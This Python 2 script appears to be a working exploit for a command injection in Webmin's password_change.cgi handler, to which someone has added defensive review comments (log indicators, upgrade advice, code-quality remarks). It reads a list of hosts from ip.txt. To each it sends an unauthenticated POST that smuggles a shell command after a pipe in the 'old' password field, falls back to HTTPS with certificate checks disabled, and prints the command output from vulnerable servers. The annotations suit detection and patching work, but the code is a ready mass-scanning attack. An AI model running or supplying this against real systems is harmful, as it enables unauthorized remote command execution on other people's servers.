import requests
import warnings
# Silences every Python warning for the whole process, not only TLS-related ones.
# NOTE(review): presumably added to hide the certificate warning triggered by
# verify=False in test_post_https -- it also hides unrelated deprecation and
# runtime warnings, so operators get no hint that TLS validation is off.
warnings.filterwarnings("ignore")

def test_post_https(ip,command):
    """Probe https://<ip>:10000/password_change.cgi and print the outcome.

    Sends a single POST with no credentials (the session cookie is the fixed
    value ``sid=x``). The ``old`` form field is ``test|`` followed by
    ``command``. The host is reported as vulnerable when the reply is HTTP 200
    and contains the "current password is incorrect" error; the text between
    that error and the first ``</h3></center>`` is printed as the result.

    Args:
        ip: Host name or address, concatenated into the URL and Referer as-is.
        command: String appended to the ``old`` field after the ``|``.

    Returns:
        None. Output goes to stdout; every exception is caught and printed.

    Review notes (defensive):
        * Path and port 10000 match Webmin's defaults -- presumably the target
          is Webmin's password-change handler; confirm against the vendor
          advisory and upgrade to a release it lists as fixed.
        * Log/IDS indicators visible in this request: POST to
          /password_change.cgi with ``expired=2`` and a ``|`` inside ``old=``,
          the fixed cookie ``redirect=1; testing=1; sid=x``, a Referer of
          /session_login.cgi, and a Firefox/52.0 User-Agent.
        * Limiting access to the admin port to management networks reduces
          exposure to probes of this kind.
    """
    try:
        url = 'https://' + ip + ':10000/password_change.cgi'
        # Static browser-like header set; identical on every request, which
        # makes it usable as a detection fingerprint.
        headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Referer': 'https://' + ip + ':10000/session_login.cgi',
            # Fixed cookie value, not obtained from a login.
            'Cookie': 'redirect=1; testing=1; sid=x',
            'Connection': 'close',
            'Upgrade-Insecure-Requests': '1',
            'Content-Type': 'application/x-www-form-urlencoded',
            # Hard-coded; does not track the real payload length, which
            # depends on `command`.
            'Content-Length': '47'
        } 

        # Form body is built by plain concatenation; `command` lands after
        # the pipe in the `old` (current password) field.
        payload = 'user=a&pam=&expired=2&old=test|' + command + '&new1=test1&new2=test1'
        # verify=False disables certificate validation, so the peer's identity
        # is not checked. No timeout= is passed: a silent host can block here.
        r = requests.post(url, data=payload, headers = headers, verify = False)
    
        if r.status_code ==200 and 'Failed to change password : The current password is incorrect' in r.text : 
            print '[+]Vulnerable:%s'%ip
    	
            # 61 is the length of the marker string, so the slice below starts
            # right after it. index() raises ValueError when the closing tag
            # is absent; that is caught by the except at the bottom.
            nPos1 = r.text.index('Failed to change password : The current password is incorrect')
            nPos2 = r.text.index('</h3></center>')
            print 'Result:'
            print r.text[nPos1+61:nPos2]

        else:
            # Any other reply is treated as not vulnerable and the full
            # response body is dumped to stdout.
            print '[!]NotVulnerable:%s'%ip
            print r.text
    except Exception as e:
            # Broad catch: connection, TLS and parsing errors are all reduced
            # to a single printed line and the function returns normally.
            print '[!]Error:%s'%e


def test_post_http(ip,command):
    """Probe http://<ip>:10000/password_change.cgi, retrying over HTTPS if told to.

    Sends the same POST as test_post_https but over plain HTTP. The ``old``
    form field is ``test|`` followed by ``command``. Three outcomes are
    handled: the "current password is incorrect" error (reported as
    vulnerable, with the text up to ``</h3></center>`` printed), the
    "running in SSL mode" notice (the probe is repeated through
    test_post_https), and anything else (reported as not vulnerable).

    Args:
        ip: Host name or address, concatenated into the URL and Referer as-is.
        command: String appended to the ``old`` field after the ``|``.

    Returns:
        None. Output goes to stdout; every exception is caught and printed.

    Review notes (defensive):
        * Path and port 10000 match Webmin's defaults -- presumably the target
          is Webmin's password-change handler; confirm against the vendor
          advisory and upgrade to a release it lists as fixed.
        * Log/IDS indicators visible in this request: POST to
          /password_change.cgi with ``expired=2`` and a ``|`` inside ``old=``,
          the fixed cookie ``redirect=1; testing=1; sid=x``, a Referer of
          /session_login.cgi, and a Firefox/52.0 User-Agent.
        * A plain-HTTP attempt followed at once by the same POST over HTTPS
          from one source matches the fallback path below.
    """
    try:
        url = 'http://' + ip + ':10000/password_change.cgi'
        # Static browser-like header set; identical on every request, which
        # makes it usable as a detection fingerprint.
        headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Referer': 'http://' + ip + ':10000/session_login.cgi',
            # Fixed cookie value, not obtained from a login.
            'Cookie': 'redirect=1; testing=1; sid=x',
            'Connection': 'close',
            'Upgrade-Insecure-Requests': '1',
            'Content-Type': 'application/x-www-form-urlencoded',
            # Hard-coded; does not track the real payload length, which
            # depends on `command`.
            'Content-Length': '47'
        } 

        # Form body is built by plain concatenation; `command` lands after
        # the pipe in the `old` (current password) field.
        payload = 'user=a&pam=&expired=2&old=test|' + command + '&new1=test1&new2=test1'
        # Cleartext request; no timeout= is passed, so a silent host can
        # block here.
        r = requests.post(url, data=payload, headers = headers)
    
        if r.status_code ==200 and 'Failed to change password : The current password is incorrect' in r.text : 
            print '[+]Vulnerable:%s'%ip
    	
            # 61 is the length of the marker string, so the slice below starts
            # right after it. index() raises ValueError when the closing tag
            # is absent; that is caught by the except at the bottom.
            nPos1 = r.text.index('Failed to change password : The current password is incorrect')
            nPos2 = r.text.index('</h3></center>')
            print 'Result:'
            print r.text[nPos1+61:nPos2]

	elif r.status_code ==200 and 'This web server is running in SSL mode.' in r.text : 
            # NOTE(review): the `elif` line above is indented with a tab while
            # the rest of the file uses spaces; Python 3 rejects this mix.
            # The server asked for TLS, so the same probe is repeated over
            # HTTPS (certificate validation is disabled there).
            print '[*]This web server is running in SSL mode.Try to use https'
            test_post_https(ip,command)	

        else:
            # Any other reply is treated as not vulnerable and the full
            # response body is dumped to stdout.
            print '[!]NotVulnerable:%s'%ip
            print r.text
    except Exception as e:
            # Broad catch: connection and parsing errors are all reduced to a
            # single printed line and the function returns normally.
            print '[!]Error:%s'%e
        
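if __name__ == '__main__':
    # Target list: ip.txt in the current working directory, one host per line.
    # The context manager closes the handle when the loop ends or raises;
    # the original left the file open for the life of the process.
    with open('ip.txt', 'r') as file_object:
        for line in file_object:
            host = line.strip('\r\n')
            if not host:
                # A blank line would otherwise produce a URL with an empty
                # host and a spurious error line.
                continue
            # Every listed host is probed with the fixed command 'id';
            # test_post_http falls back to HTTPS on its own when the server
            # reports SSL mode.
            test_post_http(host,'id')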


    
